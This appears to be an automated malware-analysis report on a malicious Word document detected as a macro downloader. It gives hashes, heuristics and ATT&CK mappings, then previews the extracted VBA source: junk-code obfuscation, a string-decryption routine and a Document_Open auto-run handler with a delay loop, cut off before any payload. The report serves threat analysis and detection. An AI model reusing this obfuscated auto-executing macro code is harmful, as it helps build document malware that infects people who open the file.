Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd514bd71718b746…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 275.0 KB
Created: 2015-12-09 11:47:00
Authoring application: Microsoft Office Word
First seen: 2017-11-20
MD5: 134a0812f799110fe38aa24b7ca5987e
SHA-1: 3096fb4c5d1d72f7b6d12a0bfb9426b922305ec3
SHA-256: fd514bd71718b746c02d41f4b8bcc23987f629460214b0647ca76c76096dacb8
Risk Score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics indicate that the Document_Open macro attempts to execute arbitrary code using the Shell() function. This is a common technique for downloading and executing further malicious content, as suggested by the ClamAV detection name 'Doc.Downloader.Adnel-6923089-0'.

Heuristics (8)

  • ClamAV: Doc.Downloader.Adnel-6923089-0 (severity: critical; id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Adnel-6923089-0
  • VBA macros detected (severity: medium; id: OLE_VBA_MACROS; 5 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; id: OLE_VBA_SHELL)
  • Document_Open macro (severity: high; id: OLE_VBA_DOCOPEN)
  • GetObject call (severity: high; id: OLE_VBA_GETOBJ)
  • CallByName call (severity: high; id: OLE_VBA_CALLBYNAME)
  • VBA p-code auto-exec with execution tokens (severity: high; id: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info; id: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://www.iec.ch (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 36964 bytes
SHA-256: bab97032f27679ec7a2d4b36e936f6644ef19f3ae04eecb42f63380c1178f5e8

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function JykTJQD4G2cOy8 Lib "CUg11kLP1XpZ" Alias "AzG6JC1HkOC" (ByVal YgAUarPfLxPdtCA As String, HTZKc23cQRC As Long) As Long
#Else
Private Declare Function JykTJQD4G2cOy8 lib "CUg11kLP1XpZ" Alias "AzG6JC1HkOC"(byval YgAUarPfLxPdtCA as String, HTZKc23cQRC as Long ) as Long
#End If
Sub LJvPzGuIEvbDez()
UKAYbwDZ57 = 12
PrjeFdHhj = 33 + 22 + 57 + 51
Beep
Err.Raise 11
Reset
Loc 36
GetObject 12, 85
If CDate(38) = True Then Nvyk5q05hN = 8078
HRmRG960xOhdF = CVErr(33)
DateAdd "R05hNTOz", 96, 31
BHfgxvQe0CWo = CVar(4)
HjMXrEGB7EIG = Day(12)
CallByName VOnl0L8H, 61, VbMethod, 12, 33, 22
Mr7DgjGS2s = UCase(57)
If CBool(51) = True Then SDwIEM9hCP9 = 94
Stop
WeekdayName 37
Weekday 84
LOzjsXjIJ0v6vo = Cos(10)
XE17KKuzTHoL = CVDate(69)
DatePart "NJ32Vn746", 61
ChDrive 83
LoadPicture 17, 45, 86, 62, 80
RgTjI5wZBmKNXtLZ = LCase(26)
Rate 16, 72, 76
FV 39, 77, 88
If CDec(4) = True Then V6Xugu2ek = 83
Command
IsDate 44
If CDbl(61) = True Then JyjarAm1V7y = 63
H16qDwlagaUNgmZ = CSng(59)
Load A00gFR6ds
MPi7q2sOqHMpNK = 51
REjVIp2fr3z1 = 41 + 97 + 28 + 63
End Sub
Function IXBQ8rXi7(ByVal AKCwkL As String, UmeZOQvT9 As String) As String
NcHt1P34 = 25
RDouSkfS = 73 + 73 + 26 + 42
On Error Resume Next
OFbMl1X7VZm5qH = 87
LlXCOfqQ1qOwG = 56 + 77 + 88 + 81
Dim ElmivNz() As Byte, L56ObCqtgE(0 To 285) As Integer, Comk() As Byte, BGqsIjn9Ar4W7tbNS, YSR3FY6aQILHBXlvq, FbuWg95k2F, B9JLDUu6bU8, V4EY3 As Boolean
Qqw9XZOphom = 71
Yuzaf = 80 + 7 + 27 + 67
ElmivNz = StrConv(AKCwkL, (64 + 1 + 64 - 1))
KjgW8N2pMAUPTc60c = 74
Fi2nVr35ba = 70 + 36 + 14 + 53
Comk() = StrConv(UmeZOQvT9, (64 + 4 + 64 - 4))
H49TBhCiIG = 25
WcZih9dmDTN = 43 + 88 + 78 + 35
YSR3FY6aQILHBXlvq = UBound(Comk)
RWo3yOnFmn = 17
IXSlOjD00MfNG = 48 + 28 + 34 + 18
For BGqsIjn9Ar4W7tbNS = 0 To (127.5 + 5 + 127.5 - 5)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS) = BGqsIjn9Ar4W7tbNS
Next BGqsIjn9Ar4W7tbNS
For BGqsIjn9Ar4W7tbNS = (128 + 8 + 128 - 8) To (142.5 + 8 + 142.5 - 8)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS) = BGqsIjn9Ar4W7tbNS Xor (128 + 2 + 128 - 2)
Next BGqsIjn9Ar4W7tbNS
For BGqsIjn9Ar4W7tbNS = 1 To (3 + 6 + 3 - 6)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS + (124.5 + 1 + 124.5 - 1)) = Comk(YSR3FY6aQILHBXlvq - BGqsIjn9Ar4W7tbNS)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS - 1) = Comk(BGqsIjn9Ar4W7tbNS - 1) Xor ((127.5 + 2 + 127.5 - 2) - Comk(YSR3FY6aQILHBXlvq - BGqsIjn9Ar4W7tbNS))
Next BGqsIjn9Ar4W7tbNS
V4EY3 = False
FbuWg95k2F = 0
B9JLDUu6bU8 = 0
For BGqsIjn9Ar4W7tbNS = 0 To UBound(ElmivNz)
If FbuWg95k2F > YSR3FY6aQILHBXlvq Then FbuWg95k2F = 0
If B9JLDUu6bU8 > (142.5 + 1 + 142.5 - 1) And V4EY3 = False Then B9JLDUu6bU8 = 0: V4EY3 = Not (V4EY3)
If B9JLDUu6bU8 > (142.5 + 4 + 142.5 - 4) And V4EY3 = True Then B9JLDUu6bU8 = (2.5 + 4 + 2.5 - 4): V4EY3 = Not (V4EY3)
ElmivNz(BGqsIjn9Ar4W7tbNS) = (ElmivNz(BGqsIjn9Ar4W7tbNS) Xor (L56ObCqtgE(B9JLDUu6bU8) Xor Comk(FbuWg95k2F)))
FbuWg95k2F = FbuWg95k2F + 1
B9JLDUu6bU8 = B9JLDUu6bU8 + 1
Next BGqsIjn9Ar4W7tbNS
BQ4X3YQb = 76
MdRZAL849TBhCi = 17 + 20 + 38 + 57
IXBQ8rXi7 = StrConv(ElmivNz(), (32 + 2 + 32 - 2))
Kl1fA = 37
IHiTDNOmV2vm = 8 + 21 + 35 + 66
End Function
Sub Document_Open()
NPUHgDq39g = 67
JzkEVf900xBR = 41 + 48 + 98 + 75
On Error Resume Next
HHsvV0SAXpLopC = 21
Lnnl8ewgIOG = 60 + 16 + 24 + 51
Dim BljIJUx8I5 As Long, MnDhCIs6Wf1q7p As Long, QJ9YpQevhGn As Long, P1ZZ6WLZ As Long
COpZ3hWr = 44
TqA1UeOSaVDnPEjUftu = 39 + 27 + 62 + 56
BljIJUx8I5 = 97673669: MnDhCIs6Wf1q7p = 0: QJ9YpQevhGn = 0
AioxM21uwTiOWQmiN = 97
NTpNi = 4 + 87 + 35 + 64
For MnDhCIs6Wf1q7p = 1 To BljIJUx8I5
QJ9YpQevhGn = QJ9YpQevhGn + 1
Next MnDhCIs6Wf1q7p
WcxI7EcvaPM8AQKU = 58
GzIxmaFC0aQj1 = 69 + 62 + 84 + 17
If QJ9YpQevhGn = BljIJUx8I5 Then
FL72KDOpvBzTBo5O2 = 55
UYzd0ANInn = 4 + 59 + 19 + 87
Dim RCyBgh8j5qV 
... (truncated)